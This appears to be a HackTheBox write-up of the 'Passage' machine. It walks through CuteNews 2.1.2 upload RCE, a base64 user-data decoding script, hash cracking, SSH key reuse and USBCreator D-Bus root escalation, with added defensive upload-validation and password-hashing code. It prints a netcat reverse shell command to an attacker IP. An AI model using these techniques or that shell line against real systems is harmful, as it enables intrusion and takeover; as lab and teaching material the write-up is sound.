HackTheBox Writeup — Passage
This is my writeup for the HackTheBox machine ‘Passage’, which runs a Linux OS and is one of the ‘Medium’ rated machines.
Summary
A web application protected by Fail2Ban means we have to do some manual enumeration, leading us to a CuteNews CMS v2.1.2 installation that is vulnerable to RCE via image upload. After getting a reverse shell we find some strange .php files that contain base64 encoded text. Decoding all of these with a Python script reveals some hash values which, once cracked, let us log in as Paul and grab user.txt. We find that another user on the box, ‘nadav’, uses Paul’s SSH key for remote access, so we use this to pivot to the ‘nadav’ user. Finally, to get root we exploit sud
1. Enumeration and Initial Foothold
I began my enumeration with an nmap scan.
```
# Nmap 7.80 scan as: nmap -sV -p- -T4 -oN scan 10.10.10.206
Nmap scan report for 10.10.10.206
Host is up (0.027s latency).
Not shown: 65533 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
```
Heading over to the web app, we can see some form of news/blog application. The most recent post states that Fail2Ban has been implemented, which bans IP addresses showing signs of malicious activity. This means we cannot brute-force directories or files.
Some manual enumeration shows that this application is powered by the CuteNews PHP News Management System. This is stated at the bottom of the home page and in some links in the HTML source, where we also find two potential usernames and a hostname: paul@passage.htb and nadav@passage.htb. A quick Google search for the CuteNews login page tells us to append /CuteNews/ to the root of the URL; this works and also gives us the version number, v2.1.2.
Unfortunately we don’t have any credentials, but we do have a version number, so I searched ExploitDB and found two potential RCE exploits: one Metasploit module and one manual exploit, both abusing an authenticated RCE vulnerability (any low-privilege user will do) via the ‘avatar’ image upload. Let’s do it manually.
First we register a user and download a random image off the Internet. Next, let’s use `exiftool` to embed a PHP shell command within the `dice.png` file.
Next we need to upload it as the avatar for our newly created low-privilege user on the CuteNews CMS.
Next, we need to intercept the request with BurpSuite and alter the filename from dice.png to dice.php and forward the request on to the web server.
Finally, once we browse to the uploaded image and append ?cmd= to its URL, we get code execution!
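The chain above works because the upload handler trusts the client-supplied filename and serves the result from a directory where PHP executes. As an added example, not CuteNews code and not part of the original writeup, here is the check a defender would want in front of an avatar upload: the client name is consulted only for its extension, the bytes must carry that type’s magic, the PNG chunk list is walked and any textual chunk containing a PHP open tag (the `Comment` tEXt chunk is where `exiftool -Comment` writes) is rejected, and the file is stored under a server-generated name so a Burp rename never reaches disk. It goes a little beyond the text by also inflating zTXt and iTXt chunks. The sample PNG, marker string and file names are constructed for the demonstration.

```python
#!/usr/bin/env python3
"""Added example, not CuteNews code: server-side checks for an avatar upload.
The sample PNG, file names and marker text are constructed."""
import os
import struct
import zlib

PNG_SIG = b"\x89PNG\r\n\x1a\n"
# Extension allow-list, each mapped to the magic bytes the content must start with.
ALLOWED = {"png": PNG_SIG, "jpg": b"\xff\xd8\xff", "jpeg": b"\xff\xd8\xff", "gif": b"GIF8"}
TEXT_CHUNKS = {b"tEXt", b"zTXt", b"iTXt"}


def _chunk(ctype: bytes, data: bytes) -> bytes:
    """Serialise one PNG chunk: length, type, data, CRC over type+data."""
    return struct.pack(">I", len(data)) + ctype + data + struct.pack(">I", zlib.crc32(ctype + data))


def build_png(comment=None, compressed=False) -> bytes:
    """Constructed 1x1 PNG. An optional Comment chunk imitates what
    `exiftool -Comment=...` adds (tEXt, or zTXt when compressed=True)."""
    ihdr = struct.pack(">IIBBBBB", 1, 1, 8, 2, 0, 0, 0)  # 1x1, 8-bit RGB
    idat = zlib.compress(b"\x00\x00\x00\x00")            # filter byte + one pixel
    chunks = [_chunk(b"IHDR", ihdr)]
    if comment is not None:
        if compressed:
            chunks.append(_chunk(b"zTXt", b"Comment\x00\x00" + zlib.compress(comment)))
        else:
            chunks.append(_chunk(b"tEXt", b"Comment\x00" + comment))
    chunks += [_chunk(b"IDAT", idat), _chunk(b"IEND", b"")]
    return PNG_SIG + b"".join(chunks)


def _text_payload(ctype: bytes, payload: bytes):
    """Return (keyword, text) for a tEXt/zTXt/iTXt chunk; compressed text is inflated."""
    keyword, _, rest = payload.partition(b"\x00")
    try:
        if ctype == b"tEXt":
            text = rest
        elif ctype == b"zTXt":
            text = zlib.decompress(rest[1:])  # one byte of compression method first
        else:  # iTXt: compression flag, method, language\0, translated keyword\0, text
            comp_flag, body = rest[0], rest[2:]
            _, _, body = body.partition(b"\x00")
            _, _, body = body.partition(b"\x00")
            text = zlib.decompress(body) if comp_flag else body
    except (zlib.error, IndexError):
        text = rest  # malformed chunk: inspect the raw bytes rather than failing open
    return keyword.decode("latin-1"), text


def png_text_chunks(data: bytes) -> list:
    """Walk the chunk list and return (keyword, text) for every textual chunk."""
    found, pos = [], len(PNG_SIG)
    while pos + 8 <= len(data):
        length, ctype = struct.unpack(">I4s", data[pos:pos + 8])
        if ctype in TEXT_CHUNKS:
            found.append(_text_payload(ctype, data[pos + 8:pos + 8 + length]))
        if ctype == b"IEND":
            break
        pos += 12 + length  # length(4) + type(4) + data + CRC(4)
    return found


def validate_upload(client_name: str, data: bytes) -> tuple:
    """Return (ok, reason). The client name is consulted only for its extension;
    the bytes decide whether the file really is that image type."""
    ext = client_name.rsplit(".", 1)[-1].lower() if "." in client_name else ""
    if ext not in ALLOWED:
        return False, f"extension '{ext}' not allowed"
    if not data.startswith(ALLOWED[ext]):
        return False, "content does not match declared image type"
    if ext == "png":
        for keyword, text in png_text_chunks(data):
            if b"<?php" in text:
                return False, f"PHP open tag found in PNG {keyword} chunk"
    return True, "ok"


def stored_name(client_name: str) -> str:
    """Never reuse the client's name on disk: random name plus the validated extension."""
    return f"{os.urandom(16).hex()}.{client_name.rsplit('.', 1)[-1].lower()}"


if __name__ == "__main__":
    marker = b"<?php /* constructed marker, not a payload */ ?>"
    for name, blob in [("dice.png", build_png()), ("dice.png", build_png(marker)),
                       ("dice.png", build_png(marker, compressed=True)),
                       ("dice.php", build_png(marker)), ("dice.png", b"not a png at all")]:
        print(name, validate_upload(name, blob))
```

Pattern-matching metadata is the cheap layer; a production handler would re-encode the image with an imaging library (which drops every metadata chunk) and serve the upload directory with script execution disabled, so that even a file that slips through has no execution sink.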
Using a netcat reverse shell (`nc -e /bin/sh 10.10.14.58 7777`) with a netcat listener open, we get a shell on the box as `www-data`.
2. User Shell — Paul
Enumerating the web directory /var/www/html/CuteNews/cdata/users/ turns up a number of strange PHP files, with all of their content base64 encoded.
I put the contents of all these files into one text file, transferred it back to my machine and wrote a quick python3 script to help sort the data. The script and an explanation are below:
- open the text file in ‘read text’ mode;
- iterate over each line in the file and remove any data that is not a base64 encoded string;
- decode the base64 strings and look for data concerning the users identified earlier in the HTML source code;
- remove duplicates from the output and only print the content with hash values present.
```python
#!/usr/bin/env python3
import base64 as b64

# every CuteNews user file starts with this PHP guard, followed by a base64 blob
GUARD = "<?php die('Direct call - access denied'); ?>"

unique = set()
with open('out.txt', 'rt') as inp_file:
    for lines in inp_file:
        # strip the PHP guard so only the base64 text is left on the line
        each_line = lines.replace(GUARD, "")
        if each_line.strip():
            decoded = b64.b64decode(each_line)
            # keep only records mentioning the users seen in the HTML source
            if "paul@passage.htb" in str(decoded) or "nadav@passage.htb" in str(decoded):
                unique.add(str(decoded))

# only the longer records carry the hash values
for item in unique:
    if len(item) > 300:
        print(item, "\n")
```
Cool, looks like we have the password hashes for paul and nadav. Putting these into CrackStation identifies them as SHA256 hashes and cracks them easily.
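Why did a lookup service crack them so easily? An unsalted fast hash maps every occurrence of a given password to the same digest, so one precomputed table answers every query in constant time. As an added example (not CuteNews code and not the hashes from the box; the wordlist and passwords are constructed), the block below builds such a table for unsalted SHA-256 and then shows the stored form a CMS should use instead: a per-user random salt and a deliberately slow KDF, here PBKDF2-HMAC-SHA256 from the standard library, which makes a precomputed table useless and each guess expensive.

```python
#!/usr/bin/env python3
"""Added example, not CuteNews code: unsalted SHA-256 versus a salted KDF.
The wordlist and passwords below are constructed for the demonstration."""
import hashlib
import hmac
import os

# Constructed mini wordlist standing in for the tables a lookup service holds.
WORDLIST = ["password", "letmein", "winter2020", "qwerty123"]


def sha256_hex(password: str) -> str:
    """Unsalted SHA-256 as a CMS might store it: same password, same hash, everywhere."""
    return hashlib.sha256(password.encode()).hexdigest()


def build_lookup(words) -> dict:
    """Precompute hash -> word once; every unsalted hash is then a dictionary lookup."""
    return {sha256_hex(w): w for w in words}


def crack_unsalted(hash_hex: str, table: dict):
    """Return the word behind an unsalted SHA-256 hex digest, or None if not tabled."""
    return table.get(hash_hex.lower())


def pbkdf2_record(password: str, iterations: int = 200_000) -> str:
    """Salted PBKDF2-HMAC-SHA256, stored as iterations$salt$hash (all hex)."""
    salt = os.urandom(16)  # fresh per record: identical passwords get different hashes
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return f"{iterations}${salt.hex()}${dk.hex()}"


def pbkdf2_verify(password: str, record: str) -> bool:
    """Recompute with the stored salt and iteration count; constant-time compare."""
    iterations, salt_hex, dk_hex = record.split("$")
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), bytes.fromhex(salt_hex), int(iterations))
    return hmac.compare_digest(dk.hex(), dk_hex)


if __name__ == "__main__":
    table = build_lookup(WORDLIST)
    print("unsalted:", crack_unsalted(sha256_hex("letmein"), table))
    rec = pbkdf2_record("letmein")
    print("salted record:", rec)
    print("verify right/wrong:", pbkdf2_verify("letmein", rec), pbkdf2_verify("letmeout", rec))
```

The iteration count is a tunable cost; the verifier reads it back from the record, so it can be raised later without invalidating existing entries.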
Trying SSH didn’t work, but when we try logging in as Paul using su we get a shell and user.txt.
3. User Shell — Nadav
Performing some enumeration as Paul doesn’t look promising, so maybe we need to escalate to nadav. Luckily, nadav’s name appears in Paul’s SSH public key, meaning the same key pair is accepted for nadav’s account, so we can use Paul’s SSH private key to get a shell as nadav.
4. Root
Running LinPEAS, we find that the box has ‘USBCreator’ installed, and LinPEAS flags it as ‘vulnerable’. Some further research shows that USBCreator’s D-Bus interface is vulnerable to local privilege escalation, provided the current user is in the `sudo` group.
Let’s check that — (I forgot to screenshot, my bad) — a replicated output will have to do.
```
nadav@passage:~$ id
uid=1000(nadav) gid=1000(nadav), 4(adm), 24(cdrom), 27(sudo), etc...
```
This vulnerability was released in June 2019 and there’s a really in-depth blog post about it here.
TL;DR on the vulnerability: I won’t repeat too much of the technical detail from the post, but in short, this vulnerability lets us write to, or copy data from, sensitive files on the filesystem, because privileged actions (run with root privileges) are performed without a password prompt, and because user-controlled input is passed unsanitised straight to the Unix tool `dd`.
This means we could use it to overwrite files such as /etc/shadow and change the root password, but since we’ve seen that SSH is heavily used on this box, let’s copy root’s SSH private key into a file instead.
Proof of the copied SSH private key for root.
… And finally, the root shell via SSH and the root flag :)
Conclusion
Thanks for reading and keep an eye out for future writeups! Feedback is always welcome, and my HackTheBox profile is linked below :)